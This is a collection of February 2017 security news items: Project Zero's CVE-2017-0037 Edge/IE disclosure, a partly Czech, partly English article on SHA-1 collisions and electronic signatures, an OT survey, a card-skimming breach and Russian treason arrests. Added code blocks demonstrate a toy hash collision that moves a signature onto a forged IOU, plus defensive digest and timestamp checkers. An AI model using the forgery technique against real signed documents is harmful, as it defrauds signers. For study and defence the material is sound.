This is the second unpatched vulnerability in a Microsoft product disclosed by Google Project Zero this month. Earlier, Mateusz Jurczyk released the details of a medium severity information disclosure flaw tracked as CVE-2017-0038.

In addition, there is an unpatched denial-of-service (DoS) flaw in Windows caused by how SMB traffic is handled.

Microsoft only released patches for Adobe Flash Player this month after postponing its February 2017 updates to March 14 due to an unspecified “last minute issue.” It’s possible that the three vulnerabilities affecting Windows and the browsers were supposed to be fixed by the delayed security updates.

Microsoft claimed last month that the security mechanisms in Windows 10 can block the exploitation of zero-day vulnerabilities even before patches are made available. As an example the company provided two flaws exploited in sophisticated attacks against organizations in South Korea and the United States before fixes could be released.


SHA-1 není bezpečná, přesto se někde stále používá. Co to znamená v praxi?

27.2.2017 Lupa.cz Kryptografie
Úspěšný kolizní útok na hašovací funkci SHA-1 má zásadní dopady i do oblasti elektronických podpisů. Důrazně nám připomíná potřebu digitální kontinuity.
V závěru minulého týdne prošla odbornějšími médii zpráva o úspěšném kolizním útoku na hašovací funkci SHA-1. Mohli jste se o tom dočíst na mnoha místech (např. i zde na Rootu), proto jen velmi stručná a zjednodušená rekapitulace: spojenými silami Googlu a amsterodamského CWI se podařilo najít (vypočítat) způsob, jakým lze (již velmi rychle a snadno) vytvářet dvojice PDF dokumentů, které jsou vzájemně kolizní vzhledem k hašovací funkci SHA-1. Jinými slovy: dokumenty jsou různé, ale při použití hašovací funkce SHA-1 mají stejný otisk (hash, či: heš).

Jak co a jak přesně se podařilo, je čtením pro odborníky. Zde si snad vystačíme s velmi zjednodušenou představou: nejde o žádné „přímé prolomení hrubou silou“, ale o využití určité „zkratky“, navíc využívající konkrétních vlastností některých formátů elektronických dokumentů.

Konkrétně u formátu PDF se využívá toho, že kromě užitečného obsahu mohou mít konkrétní PDF dokumenty i poměrně velkou „vycpávku“, která se dá upravovat tak, aby při vkládání různého obsahu dokument stále vykazoval stejný otisk (při použití hašovací funkce SHA-1). To, co bylo nyní nalezeno, samozřejmě po dlouhých a náročných výpočtech, je základ takového PDF dokumentu, se kterým lze přesně toto dělat.

Praktické dopady si lze ukázat na prvních generátorech kolizních PDF dokumentů, které se velmi rychle objevily. Například tento (prý jen narychlo spíchnutý) vám umožní přijít se dvěma různými obrázky (musí být ve formátu JPG a do 64 kB), a z nich vám (prakticky ihned) vytvoří dva stejně velké soubory ve formátu PDF se stejným SHA-1 otiskem, ale s různým obsahem: každý z nich ukazuje jeden z obou vstupních obrázků.

Pro potřeby tohoto článku, a zejména pro názorné předvedení praktických důsledků, jsem si sám nechal vytvořit dva takovéto kolizní dokumenty: jeden s číslem 1, druhý s číslem 1000 (pro jejich vzájemné odlišení). Jde o soubory 1.pdf a 1000.pdf, které si můžete stáhnout v tomto ZIP balíčku i s jejich externím el. podpisem (viz dále).

To, že oba PDF dokumenty (s různým obsahem) mají stejný SHA-1 otisk, si můžete ověřit pomocí libovolného nástroje, který takový otisk dokáže spočítat. V on-line podobě je jich k dispozici řada, zde je použit tento:

Stejně tak si můžete sami vyzkoušet nový nástroj (file tester), který výzkumníci z Googlu a CWI sami zveřejnili, a který slouží k odhalování takovýchto vzájemně kolizních dokumentů (tj. různých, ale se stejným SHA-1 otiskem). A to dokonce tak, že jim stačí jen jeden z obou (vzájemně kolizních) dokumentů.

Je to možné díky tomu, že jejich nástroj vlastně testuje, zda jde o PDF dokument, se kterým si někdo (zde konkrétně: použitý generátor kolizních dokumentů) „hrál“ tím způsobem, na který oni právě přišli. Zjednodušeně: zda jde o onen specifický „základ“ PDF dokumentu, do kterého byl vložen nějaký konkrétní obsah a současně byla upravena jeho „vycpávka“ tak, aby soubor ve formátu PDF měl jako celek stále stejný otisk.

What does the same digest mean?
When two different documents have the same digest, it is of course a problem. A big problem. It shows up wherever one does not work with the whole files directly but only with their digests, because then they cannot be told apart.

For example, in various systems for managing files and their versions, identical files can be detected precisely by their digest. But once it can no longer be relied on that two different files have different digests, such detection stops being usable.

Another big example is electronic signatures: electronic signing actually works (and must work) in such a way that what is signed is not the signed file itself (which can be arbitrarily large) but its digest, which has a fixed (and "small") size. You can surely guess the consequences: if two different files have the same digest, they will also have the same electronic signature, and so it will no longer be possible to tell which of them was originally signed.

Let us again show this on a concrete example: I furnished one of the documents described above with my qualified electronic signature, using the SHA-1 hash function. In effect I thus signed the digest that is the same (shared) for both files.

So that you can easily verify for yourself that both files (1.pdf and 1000.pdf) have (when SHA-1 is used) the same electronic signature, and that it therefore does not matter, and cannot be determined, which of them I originally signed, I chose the variant of an external (detached) electronic signature. In the ZIP package, which you can download and try out, this external electronic signature is contained in the file podpis.pkcs7.

For practical verification that one signature "fits" both different (but, under SHA-1, mutually colliding) PDF files you naturally need a tool that can work with external signatures. There are not many of them today, but you can try, for instance, this "EU" validator. As the "Signed file" you must give it the file with the signature (i.e. podpis.pkcs7), and as the signed file then both PDF files in turn (1.pdf and 1000.pdf). In both cases one and the same signature should be evaluated as a valid qualified electronic signature of either of the two PDF documents (files). So you really cannot tell which of the two documents I actually signed and which I did not.

How dangerous is it?
To what has been said so far let us add one important aspect: what is (so far) at stake are collisions the author refers to as first-order collisions. That is, collisions in which one looks for (some) two documents that have different content but the same digest (here: a digest computed with SHA-1). Finding second-order collisions is even harder: here you already have a specific document and look for another document with the same digest (what cryptographers call a second preimage).

The practical consequences of second-order collisions, specifically for electronic signatures, are even easier to imagine than those of first-order collisions: we already have an electronic document that someone else validly signed. Say an IOU or a contract with specific content. Someone with ill intent, however, finds for this validly signed document another document with different content (for example an IOU for a higher amount, a contract with different terms, etc.), and thanks to the colliding nature of the two documents presents the newly found document as the one actually signed. And unless some other evidence is available, it will not be possible to tell from the electronic documents themselves which of them was actually signed and to which the signature from the other document was merely transferred.

However, various frauds can be committed with first-order collisions as well. The scenario just has to be a little different and more complex: whoever wanted to defraud someone must prepare two mutually colliding documents with the content they need for the fraud. Then they must get the person they want to defraud to sign one of them. Then they can take that person's electronic signature and "transfer" it onto the other (colliding) document.
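The signature-transfer scenario described above, reproduced as an added example that is not part of the article: because a detached signature is computed over the digest rather than the document, any second document with the same digest passes verification. To keep the collision search to milliseconds, the example assumes a toy hash (SHA-1 truncated to 24 bits) and uses an HMAC under a constructed secret key as a stand-in for a private-key signature; the two documents and the padding scheme are constructed here as well.

```python
import hashlib
import hmac
import os
from typing import Dict, Tuple

# Toy hash (assumption): SHA-1 truncated to TRUNC_BYTES bytes, so that a
# collision is cheap to find. With TRUNC_BYTES = 20 this is plain SHA-1 and the
# same search would need roughly 2**80 evaluations instead of about 2**12.
TRUNC_BYTES = 3

def toy_digest(data: bytes, n: int = TRUNC_BYTES) -> bytes:
    return hashlib.sha1(data).digest()[:n]

# Constructed secret; stands in for the signer's private key.
SIGNING_KEY = os.urandom(32)

def sign_detached(doc: bytes, key: bytes = SIGNING_KEY) -> bytes:
    """Detached signature over the *digest* of doc, which is how real signature
    schemes work. HMAC-SHA-256 stands in for RSA/ECDSA so that only the standard
    library is needed; the structural weakness is identical."""
    return hmac.new(key, toy_digest(doc), hashlib.sha256).digest()

def verify_detached(doc: bytes, signature: bytes, key: bytes = SIGNING_KEY) -> bool:
    return hmac.compare_digest(sign_detached(doc, key), signature)

def find_cross_collision(doc_a: bytes, doc_b: bytes,
                         n: int = TRUNC_BYTES) -> Tuple[bytes, bytes, int]:
    """Append throw-away padding to two documents with different payloads until
    their toy digests agree (the role the adjustable padding plays in the
    colliding PDFs). Birthday bound: on the order of 2**(8*n/2) evaluations."""
    seen_a: Dict[bytes, bytes] = {}
    seen_b: Dict[bytes, bytes] = {}
    i = 0
    while True:
        pad = b"\n%% padding " + str(i).encode()
        da, db = toy_digest(doc_a + pad, n), toy_digest(doc_b + pad, n)
        if da == db:
            return doc_a + pad, doc_b + pad, i + 1
        if da in seen_b:
            return doc_a + pad, seen_b[da], i + 1
        if db in seen_a:
            return seen_a[db], doc_b + pad, i + 1
        seen_a[da] = doc_a + pad
        seen_b[db] = doc_b + pad
        i += 1

def compare_digests(x: bytes, y: bytes) -> Dict[str, bool]:
    """Whether x and y collide under the toy hash, full SHA-1 and SHA-256.
    A verifier that recomputes a full-length modern digest is not fooled."""
    return {
        "toy": toy_digest(x) == toy_digest(y),
        "sha1": hashlib.sha1(x).digest() == hashlib.sha1(y).digest(),
        "sha256": hashlib.sha256(x).digest() == hashlib.sha256(y).digest(),
    }

if __name__ == "__main__":
    a, b, trials = find_cross_collision(b"IOU: amount 1", b"IOU: amount 1000")
    sig = sign_detached(a)                 # the victim signs document a only
    print(f"collision after {trials} trials")
    print("signature verifies for a:", verify_detached(a, sig))
    print("signature verifies for b:", verify_detached(b, sig))
    print("collides under:", compare_digests(a, b))
```

Raising TRUNC_BYTES shows the point the article makes later about computing power: each extra byte of digest multiplies the expected search effort by 16, which is why at the full 20 bytes a brute-force birthday search is out of reach and the real attack needed a cryptanalytic shortcut. A verifier that recomputes a full-length SHA-256 over the file (the last entry of compare_digests) is unaffected by the toy collision.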

What to do about it?
The danger just described is real, but it can be avoided fairly easily: by switching in time to "better" (more thorough, more elaborate and more complex) hash functions. This, incidentally, does not concern only the SHA-1 hash function discussed today, but hash functions in general, which turn "something larger" (the whole file) into "something smaller" (the digest/hash).

Their basic property is that creating the digest (hashing) is one-way only, and that the original document cannot be reconstructed from the digest alone. That is in fact impossible in principle: a small digest (in the case of SHA-1 it is 20 bytes, i.e. 160 bits) is not enough for you to recreate, say, a multi-megabyte original document from it.

Therefore in practice we are concerned with something else: that it should not be feasible to find two (or more) different documents that have, when the same hash function is used, the same digest. That, in principle, must be possible, and such documents must even exist in really large numbers (if we do not restrict their size, then infinitely many). So in practice something weaker suffices: that it should not be within the power of currently available computers to find at least two such documents sooner than after some really long time (say, tens of thousands of years).

But the capabilities of computers grow very quickly, and so what would take today's computers more than those tens of thousands of years, tomorrow's computers might manage in, say, an hour. Or even faster, if some shortcut or other trick is found, as has just happened in the case of the SHA-1 hash function.

That is exactly why it is absolutely necessary to move gradually from "older" hash functions, in the sense of less demanding in the complexity of finding colliding documents, to "newer" ones, which are more reliable and above all substantially more demanding in the computational complexity of finding colliding documents. This already happened in the case of the even "older" hash function MD5, and the same applies to SHA-1. It has been known for a long time that SHA-1 is not strong enough, and it was only a matter of time before a practical way to find colliding documents in a sufficiently short time appeared. Now it has.

What about the transition for electronic signatures?
For electronic signatures, the transition in the Czech Republic from SHA-1 to the newer SHA-2 family of hash functions (comprising the variants SHA-224, SHA-256, SHA-384 and SHA-512) took place at the turn of 2009 and 2010. At that time the Ministry of the Interior "ordered" such a transition for those entities it could command (the qualified certification authorities).

Qualified certification service providers shall cease issuing qualified certificates with the SHA-1 algorithm by 31 December 2009.
The truth is that since that time our qualified (or accredited) authorities have indeed issued only certificates that rely on hash functions from the SHA-2 family, most often SHA-256 (with a digest/hash size of 256 bits).

We must realize, however, that issuing certificates "with SHA-2" means only that the certification authority itself uses a SHA-2 hash function to sign (seal) the certificate it issues. More precisely: from the part of the certificate that is signed it computes a digest using a SHA-2 hash function, and signs that digest (applies its seal to it). This is then recorded in the content of the certificate itself, see the following picture. It shows two of my older certificates: on the left a certificate from 2004, in whose issuance SHA-1 was still used; on the right a certificate from 2010, issued already with SHA-2 (specifically SHA-256).

Signing is not the same as issuing a certificate!
But beware of one very important thing: whether your certificate was issued with SHA-2 does not yet determine which hash function will be used when you sign a specific document.

This follows from the fact that you can create an electronic signature (with the private key) and verify its validity (with the public key) even without having any certificate issued at all. The certificate is, after all, only a kind of attestation (from a trusted third party) of whom the key belongs to (who declares it to be theirs). If you hand your key over in person to someone who knows you well, they basically do not need your certificate at all.

In other words: whether your electronic signature uses the SHA-1 hash function, one of the SHA-2 hash functions, or any other is independent of which hash function was used to issue the certificate. What actually matters is what the program you use for signing does and how (or how it is configured).

To demonstrate this, I created the following PDF document, which I furnished with five of my qualified electronic signatures (all based on the same qualified certificate with SHA-256). But each of these signatures was created with a different hash function: in order MD5, SHA-1, SHA-256, SHA-384 and SHA-512.

You can verify this yourself. In Adobe Acrobat Reader DC, for instance, you can display the hash function used to create a specific electronic signature via "Signature Properties" and "Advanced Signature Properties", as in the following picture.

Adobe Acrobat Reader is, moreover, one of the few programs that can still create electronic signatures using the SHA-1 hash function (and even MD5). It is in fact the program I used to create the example file with 5 different signatures described above. To do so I had to change the program's settings according to the guide described here. From version 9.1 Adobe Reader (today: Adobe Acrobat Reader DC) should be configured by default to use the SHA-256 hash function when signing, so ordinary users do not need to change this setting.

For signing documents with MS Office programs it should hold (at least according to this source) that up to version 2010 signatures are still created with SHA-1, and in newer versions with SHA-2. Any change of settings can be made in the way described here.

It is interesting in other cases too, such as signing e-mail messages. Here too it of course depends on how the respective program is configured. In MS Outlook, for example, the hash function is chosen when selecting the certificate for signing, see the picture.

For a specific message you can then display the hash function used by the procedure shown in the following picture.
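As an added, programmatic counterpart to reading the hash algorithm off the signature properties dialog (this is not code from the article or its author): a small DER walker that lists the digest-algorithm OIDs found in a detached CMS/PKCS#7 signature such as podpis.pkcs7 and flags the weak ones. The two sample signatures at the bottom are constructed skeletons containing only the digestAlgorithms set; the path passed to audit_file is whatever signature file you have on disk.

```python
from typing import List

# Bare digest-algorithm OIDs (standard values). In a CMS/PKCS#7 SignedData these
# appear in the digestAlgorithms set and in each SignerInfo.digestAlgorithm; the
# CA's certificate signature uses a different, combined OID (such as
# sha256WithRSAEncryption), so the CA's choice is not confused with the signer's.
DIGEST_OIDS = {
    "1.2.840.113549.2.5": "MD5",
    "1.3.14.3.2.26": "SHA-1",
    "2.16.840.1.101.3.4.2.4": "SHA-224",
    "2.16.840.1.101.3.4.2.1": "SHA-256",
    "2.16.840.1.101.3.4.2.2": "SHA-384",
    "2.16.840.1.101.3.4.2.3": "SHA-512",
}
WEAK_DIGESTS = {"MD5", "SHA-1"}

def _read_tlv(buf: bytes, pos: int):
    """Parse one DER tag-length-value at pos; return (tag, constructed, value, next_pos)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length == 0x80:
        raise ValueError("indefinite-length BER encoding is not supported")
    if length & 0x80:                       # long form: next (length & 0x7F) bytes hold the length
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    if pos + length > len(buf):
        raise ValueError("truncated DER element")
    return tag, bool(tag & 0x20), buf[pos:pos + length], pos + length

def decode_oid(value: bytes) -> str:
    """Decode the contents of an OBJECT IDENTIFIER into dotted form."""
    arcs = [value[0] // 40, value[0] % 40]
    n = 0
    for b in value[1:]:                      # base-128, high bit set on all but the last byte
        n = (n << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(n)
            n = 0
    return ".".join(map(str, arcs))

def iter_oids(buf: bytes):
    """Yield every OID in the structure, descending into constructed elements."""
    pos = 0
    while pos < len(buf):
        tag, constructed, value, pos = _read_tlv(buf, pos)
        if tag == 0x06:
            yield decode_oid(value)
        elif constructed:
            yield from iter_oids(value)

def digest_algorithms(der: bytes) -> List[str]:
    """Names of the digest algorithms referenced in der, in order of first appearance."""
    found: List[str] = []
    for oid in iter_oids(der):
        name = DIGEST_OIDS.get(oid)
        if name and name not in found:
            found.append(name)
    return found

def weak_digests(der: bytes) -> List[str]:
    return [name for name in digest_algorithms(der) if name in WEAK_DIGESTS]

def audit_file(path: str) -> List[str]:
    """Report weak digest algorithms in a DER-encoded detached signature file."""
    with open(path, "rb") as f:
        return weak_digests(f.read())

# Constructed minimal SignedData skeletons (ContentInfo with a digestAlgorithms set only):
SAMPLE_SHA1_SIGNATURE = bytes.fromhex(
    "30 1F 06 09 2A 86 48 86 F7 0D 01 07 02"      # contentType = id-signedData
    "A0 12 30 10 02 01 01"                        # [0] SignedData { version 1,
    "31 0B 30 09 06 05 2B 0E 03 02 1A 05 00"      #   digestAlgorithms { sha1, NULL } }
)
SAMPLE_SHA256_SIGNATURE = bytes.fromhex(
    "30 23 06 09 2A 86 48 86 F7 0D 01 07 02"
    "A0 16 30 14 02 01 01"
    "31 0F 30 0D 06 09 60 86 48 01 65 03 04 02 01 05 00"
)
```

Expect an embedded RFC 3161 time stamp to contribute its own digest OID (the TSA's message imprint), so on a time-stamped signature a SHA-1 hit may come from the token rather than from the signer; BER-encoded signatures with indefinite lengths are rejected rather than misparsed.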

Who is still using SHA-1?
With electronic signatures it is therefore necessary to bear in mind that the way certificates are issued and the signing itself are two different things: even if you have a certificate with SHA-2, it still depends on what the program you use for signing does and how. And it should be sufficiently clear from the above why it is highly advisable to stop using the SHA-1 hash function.

The truth is that virtually all (current) signing programs I know of that are intended for "end users" already support the SHA-2 functions and are also configured to use them (with the exception of signing in MS Office in versions up to and including 2010, see above). That is because their authors realized the need for the transition from SHA-1 to SHA-2 in time, and made it.

A real problem, however, may lie with various "hard-wired" solutions that their authors have not yet modified (or whose operators have not asked for it). I did not conduct any systematic survey in this regard, but I only took a cursory look at several services of our eGovernment, and found that, for example, (machine-generated) extracts from the commercial registers, or extracts from the basic registers, are still signed using SHA-1. The following pictures show this.

For the first of them I deliberately switched Adobe Acrobat Reader DC to English so that it is clearly visible that the Czech localization has a minor bug: while the English version prints "Hash Algorithm: SHA1", the Czech version lacks the colon and the following space in the corresponding message, and so it incorrectly prints "Algoritmus hashSHA1".

It is not true, however, that all solutions within our eGovernment still sign (mark, or seal) using SHA-1. Hopefully it is just the opposite, and most of them switched to SHA-2 long ago. The data boxes (datové schránky), for instance, have marked their messages using SHA-256 since 2011. Among the machine-generated extracts from public registers, the trade licensing register, for example, has no problem with SHA-2.

Incidentally: the extracts from the trade licensing register are also already in the so-called reference format of electronic signature, which public authorities should have been using since 2011 (originally because of this Commission Decision 2011/130/EU, now because of eIDAS). Which the above-mentioned extracts from the basic registers or from the Commercial Register still do not do.

And that is not to mention that Act No. 297/2016 Coll. on trust services, already in force today, requires in its Section 11 that even such extracts from public registers be furnished with a time stamp. Which to this day they are not. Yet it is precisely a time stamp, added to the document and created from a digest already computed with SHA-2, that could eliminate the danger arising from the use of the outdated and weak SHA-1 function.

Let us not ignore digital continuity!
At the end of this article I would like to take the opportunity to emphasize once again the long-ignored problem of digital continuity. That is, the problem of what has just been very clearly demonstrated and proven to us: that cryptographic algorithms and functions become obsolete over time, as the computing capacity of available computers grows (and as various tricks and "shortcuts" to speed things up are occasionally found). Which opens up, and makes genuinely passable, a path for those who would like to replace the documents we originally signed with (colliding) documents of their own. If only to turn the original 1 into 1000 (see the real example in this package).

So if we want to keep our electronic documents in such a state that we can still rely on them, even after a longer time, we must get ahead of this trend. We must take care to strengthen in time the way our documents are protected against possible substitution by colliding documents. We must not wait until it becomes genuinely possible, because then it would already be too late. We must do it in time, and regularly, through the deployment of new, "better" and above all stronger hash functions and longer keys. Most easily by adding further time stamps (regular re-stamping).

This necessity is still being forgotten. Probably because it is laborious, relatively complex, and also costs something. Of course it is easier to do nothing and leave electronic documents lying around somewhere in a drawer, imagining that in x years we will be able to use them (and above all: rely on their genuineness and authenticity) exactly as today. Let today's story about the hash function be a memento and a stern warning to us that this is not and will not be so.
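One way to make the regular re-stamping the article calls for checkable, as an added example (not the author's code): a minimal archive-timestamp chain in which every renewal hashes the document, its original signature and all earlier stamps with the newer algorithm, and a verifier that accepts an old SHA-1 stamp only if it was superseded before SHA-1 collisions became practical. The TSA key, the dates and the cut-off date assumed for SHA-1 are constructed; the HMAC token stands in for a real RFC 3161 token.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from typing import Dict, List

# Constructed secret; stands in for the time-stamping authority's private key
# (a real TSA signs RFC 3161 tokens; HMAC keeps this standard-library only).
TSA_KEY = os.urandom(32)

@dataclass(frozen=True)
class TimeStamp:
    hash_alg: str    # hashlib name, e.g. "sha1", "sha256"
    issued_at: int   # Unix time asserted by the TSA
    imprint: bytes   # digest of the covered data
    token: bytes     # TSA "signature" over (hash_alg, issued_at, imprint)

def _digest(alg: str, data: bytes) -> bytes:
    return hashlib.new(alg, data).digest()

def _token(alg: str, issued_at: int, imprint: bytes) -> bytes:
    msg = alg.encode() + issued_at.to_bytes(8, "big") + imprint
    return hmac.new(TSA_KEY, msg, hashlib.sha256).digest()

def issue_timestamp(alg: str, data: bytes, issued_at: int) -> TimeStamp:
    imprint = _digest(alg, data)
    return TimeStamp(alg, issued_at, imprint, _token(alg, issued_at, imprint))

def _covered(document: bytes, signature: bytes, earlier: List[TimeStamp]) -> bytes:
    # Each renewal covers the document, its original signature and every earlier
    # stamp, so the newest hash protects the whole history (archive-timestamp idea).
    return document + signature + b"".join(t.token for t in earlier)

def renew(chain: List[TimeStamp], document: bytes, signature: bytes,
          alg: str, now: int) -> List[TimeStamp]:
    return chain + [issue_timestamp(alg, _covered(document, signature, chain), now)]

def verify_chain(chain: List[TimeStamp], document: bytes, signature: bytes,
                 broken_since: Dict[str, int]) -> bool:
    """broken_since maps a hash name to the Unix time from which collisions are
    considered practical. A stamp whose algorithm later broke is still evidence
    only if both it and the next stamp superseding it predate that time."""
    if not chain:
        return False
    for i, ts in enumerate(chain):
        if not hmac.compare_digest(ts.token, _token(ts.hash_alg, ts.issued_at, ts.imprint)):
            return False                                   # forged or altered stamp
        if ts.imprint != _digest(ts.hash_alg, _covered(document, signature, chain[:i])):
            return False                                   # document or history changed
        if i and ts.issued_at < chain[i - 1].issued_at:
            return False                                   # stamps must be chronological
        broke = broken_since.get(ts.hash_alg)
        if broke is not None:
            if ts.issued_at >= broke:
                return False                               # stamped with an already-broken hash
            if i + 1 >= len(chain) or chain[i + 1].issued_at >= broke:
                return False                               # not re-stamped in time
    return True

# Constructed scenario: a document signed (over SHA-1) and stamped in 2010, then
# re-stamped with SHA-256; SHA-1 collisions treated as practical from 2017-02-23.
T_2010, T_2015, T_2018 = 1262304000, 1420070400, 1514764800
SHA1_BROKEN = {"sha1": 1487808000}
DOCUMENT = b"IOU: amount 1"
SIGNATURE = b"<original SHA-1 based signature bytes, constructed>"

def scenario(renew_at: int) -> bool:
    """True if the chain still proves the document after renewal at renew_at."""
    chain = [issue_timestamp("sha1", _covered(DOCUMENT, SIGNATURE, []), T_2010)]
    chain = renew(chain, DOCUMENT, SIGNATURE, "sha256", renew_at)
    return verify_chain(chain, DOCUMENT, SIGNATURE, SHA1_BROKEN)

if __name__ == "__main__":
    print("re-stamped in 2015:", scenario(T_2015))   # True
    print("re-stamped in 2018:", scenario(T_2018))   # False: SHA-1 already broken
```

The cut-off date is the policy knob: an organization decides from which date a SHA-1 stamp no longer counts, and any document whose chain was not extended before that date has to be re-established by other means, which is exactly the situation the article warns against.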


CVE-2017-0037 – Google Project Zero discloses another unpatched Microsoft Edge and IE Vulnerability
27.2.2017 securityaffairs Vulnerability

The researchers at Google’s Project Zero have revealed another flaw, tracked as CVE-2017-0037, that affects Microsoft Edge and IE.
It has happened again, the researchers at Google’s Project Zero have revealed another flaw, tracked as CVE-2017-0037, in Microsoft products.

The flaw affects Microsoft’s Internet Explorer and Edge browsers, it was first reported on November 25 by the Google researcher Ivan Fratric, and Google publicly released the details of the vulnerability as Microsoft did not fix it within its 90-day disclosure deadline.

The CVE-2017-0037 vulnerability, a so-called “type confusion flaw”, resides in a module in Microsoft Edge and Internet Explorer and lets attackers execute arbitrary code on the target machine when the victim visits a malicious website.

The flaw affects all Windows 7, Windows 8.1, and Windows 10 users.

The researcher has also published a proof-of-concept exploit that can crash Edge and IE, allowing an attacker to execute code and gain administrator privileges on the affected systems.

In the note included in the exploit code, Fratric confirmed that the attack works on the 64-bit version of IE on Windows Server 2012 R2. The flaw affects 32-bit IE 11 as well as Microsoft Edge.

Looking at the technical details of the CVE-2017-0037 vulnerability, it is possible to note that it works by attacking a type confusion in HandleColumnBreakOnColumnSpanningElement.

The 17-line proof-of-concept crashes this process; the analysis turns on the contents of the two registers rcx and rax.

“However, an attacker can affect rax by modifying table properties such as border-spacing and the width of the first th element. Let’s see what happens if an attacker can point rax to the memory he/she controls.” reads the analysis shared by Project Zero Team.

“Assuming an attacker can pass a check on line 00007ffe`8f330a59, MSHTML!Layout::Patchable<Layout::PatchableArrayData<Layout::MultiColumnBox::SMultiColumnBoxItem> >::Readable is called again with the same arguments. After that, through a series of dereferences starting from rax, a function pointer is obtained and stored in rdi. A CFG”

Earlier this month, after Microsoft delayed February’s Patch Tuesday, the experts at Project Zero publicly disclosed a flaw in the Windows Graphics Device Interface (GDI) library because Microsoft had failed to patch it within the 90-day window given by Google.

On Tuesday Microsoft issued the security updates KB 4010250 that address flaws in Adobe Flash Player, but two already disclosed flaws remain unpatched.

The first flaw is a Windows SMB (Server Message Block) vulnerability that affects Windows 8, Windows 10 and Windows Server. It is a memory corruption vulnerability in the SMB protocol that can be exploited by a remote attacker; proof-of-concept exploit code for the flaw was recently released publicly.

The second flaw not addressed by the latest security updates is the one recently disclosed by the Google Project Zero team that affects Windows operating systems ranging from Windows Vista Service Pack 2 to the latest Windows 10.


US Oil and Gas Industry unprepared to mitigate risks in operational technology (OT) environments
27.2.2017 securityaffairs Cyber

A study commissioned by Siemens revealed that the US oil and gas industry is unprepared to mitigate cybersecurity risks in operational technology environments.
A new study commissioned by the engineering firm Siemens revealed that the oil and gas industry in the United States is largely unprepared to mitigate cybersecurity risks in operational technology (OT) environments.

The survey was conducted by the Ponemon Institute and involved 377 individuals who are responsible for securing or overseeing cyber risk in the OT environment. Sixty-eight percent of respondents admitted having suffered at least one cyber incident in the past year that caused OT disruption or loss of confidential information.

Only 41 percent of respondents said they continually monitor all infrastructure to prioritize threats and attacks. A worrying finding of the survey is that an average of 46 percent of all cyber attacks in the OT environment go undetected, which means organizations need to improve their security posture by adopting threat detection systems.

One in five respondents (20%) admitted that their organizations were compromised by a sophisticated strain of malware such as Duqu and Flame.

Exploratory information and production information are the most vulnerable areas in the oil and gas value chain.

“Exploratory information is the area most vulnerable in the oil and gas value chain to a cyber attack. When asked to identify the top seven areas of greatest risk, 72 percent of respondents say it is exploratory information and 60 percent of respondents say it is production information” reads the study.

The majority of respondents rate their organization’s OT cyber readiness as low to medium; only 35 percent believe they are resilient to cyber attacks.

Sixty-seven percent believe cyber threats have had a significant impact on the risk to industrial control systems (ICS).

Sixty-nine percent of individuals who participated in the survey are concerned about the risks associated with third-parties in the supply chain.

“Cyber risks, especially across the supply chain, are difficult to address. Sixty-nine percent of respondents believe their organization is at risk because of uncertainty about the cybersecurity practices of third parties in the supply chain and 61 percent say their organization has difficulty in mitigating cyber risks across the oil and gas value chain.” continues the report.


Negligent and malicious or criminal insiders are considered the principal threats to the U.S. oil and gas industry.

“Together negligent and malicious or criminal insiders pose the most serious threat to critical operations. Sixty-five percent of respondents say the top cybersecurity threat is the negligent or careless insider and 15 percent of respondents say it is the malicious or criminal insider.”

Let’s close with a look at the factors that pose the major risks to the organizations. Roughly 60 percent of respondents pointed out outdated and aging control systems or vulnerable IT products used in production environments.



Roberts Hawaii tour company hacked, credit card and personal info exposed
27.2.2017 securityaffairs Hacking

The tour company Roberts Hawaii is warning its customers about a security breach that may affect people who purchased tours and other services on its website.
Did you visit Hawaii last year? The tour company Roberts Hawaii is warning its customers about a data breach that may affect people who purchased tours from July 2015 to December 2016. That is a very long period, but there is no information about the number of affected customers.

The Roberts Hawaii company offers tours along with school bus services, airport shuttles, and other transportation packages.

Compromised records include name, address, email address, phone number, payment card number, expiration date and card security code.

The tour company discovered the security breach after customers reported fraudulent charges on their credit cards.

“The tour company found out about the hack after getting reports of fraudulent charges on customers’ credit cards. The charges appeared shortly after the customers made purchases on Roberts Hawaii’s website.” reported the Hawaii News Now.


According to the investigators, the charges appeared shortly after the customers had purchased a tour on the Roberts Hawaii website.

“Roberts Hawaii received reports from several customers of fraudulent charges appearing on their payment cards shortly after they were used to make a purchase on its website.” reads the security advisory published by the company. “Roberts Hawaii immediately initiated an investigation and engaged a leading cyber security firm to examine their website network.”

The cyber criminals have compromised the web server of the company with a malicious code that copied customers’ data during the checkout procedure.

According to the Roberts Hawaii company, orders placed between July 30, 2015, and Dec. 14, 2016, may have been affected.

Roberts Hawaii confirmed that it has contained the security breach: it removed the malware installed on its server and shut down the affected payment collection pages.

“All payment collection pages on the compromised server were replaced entirely with third party online booking software and Roberts Hawaii is also taking steps to further strengthen the security of its website to help prevent a similar incident from happening in the future.” continues the advisory published by the company.

In order to mitigate the exposure of its customers, the company has established a dedicated call center ((877) 235-0796) and web page to answer customer questions.

“Our customers’ confidence and trust are important to us, and we sincerely apologize for any inconvenience or concern this may have caused. We are working swiftly to address this situation and help prevent a future recurrence,” said Wayne Fernandez, director of safety and security for Roberts Hawaii, in a news release.


Russian cyber experts were charged with treason due to the allegations made seven years ago
27.2.2017 securityaffairs Cyber

In December 2016 two Russian state security officers and a cyber security expert in Moscow were charged with treason due to allegations made seven years ago.
In December 2016 two Russian state security officers and a cyber-security expert in Moscow were charged with treason due to allegations made by a Russian businessman seven years ago.

One of them is the head of the computer incidents investigation team at Kaspersky Lab, Ruslan Stoyanov, the two officers of the Federal Security Service (FSB) are Sergei Mikhailov and Dmitry Dokuchayev.


According to the sources, the arrested suspects may have passed secrets to the US firm Verisign and other unidentified American companies, which then shared them with US intelligence agencies.

The authorities have given no public explanation for the arrests, but a source connected to the investigation told Reuters that the arrests were the result of accusations made in 2010 by Pavel Vrublevsky, a Russian businessman and founder of the online payments company ChronoPay.

Verisign representatives deny that the company received secrets from the cyber security expert.

“Verisign Vice President Joshua Ray declined to comment on Stoyanov specifically, but said his company acquired information in unclassified ways and does not believe its reports to government agencies and other customers included state secrets.” reads the article published by Reuters.

Russian authorities and the Russian FSB declined to comment on the case.

According to cyber security experts, the arrests are the response of the Kremlin to any sort of collaboration between Russian experts and US authorities.

